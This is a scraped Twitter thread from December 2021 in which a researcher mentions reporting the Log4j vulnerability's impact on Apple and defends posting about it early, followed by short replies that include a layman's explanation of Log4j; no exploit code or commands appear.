A story in three parts 馃樁 #log4j
60
1,199
238
4,266
Disclaimer: I'm fairly sure I'm not the first one to have tried this but I flagged it with Apple's product security team either way. I'm sure they are busy enough patching their systems 馃槄
4
14
1
451
Disclaimer虏: Normally I wouldn't share such vulns before the vendor has had a chance to mitigate. However, I chose differently in this case because 1) The issue is already very widespread 2) I likely wasn't the first one to tell Apple 3) It's a prime example of how deep this goes

Dec 10, 2021 路 4:39 PM UTC 路 Twitter Web App

5
25
539
Replying to @chvancooten
this is the story few 3 moth ago
2
Replying to @chvancooten
Normally feds would not bust people for showing the exploitation of the widespread vulns on twitter. However, they might choose to do it differently this time just because they have the proof of the criminal offense this time.
1
This vulnerability existed for decades in html how has nobody tried it in java before until now
Replying to @chvancooten
Don't forget 4) There are already bots actively seeking exploitable targets right now, it's an active exploit.
1
Replying to @chvancooten
Would u mind explaining like you would to your nephew 馃槄
1
1
My layman's understanding: Apache Log4j is a widely-used, free, volunteer-made tool for logging things that happened on your computer. Turns out they made a REALLY big whoopsie: if you send computer code to a computer using log4j, log4j will just run that code no questions asked.
1
4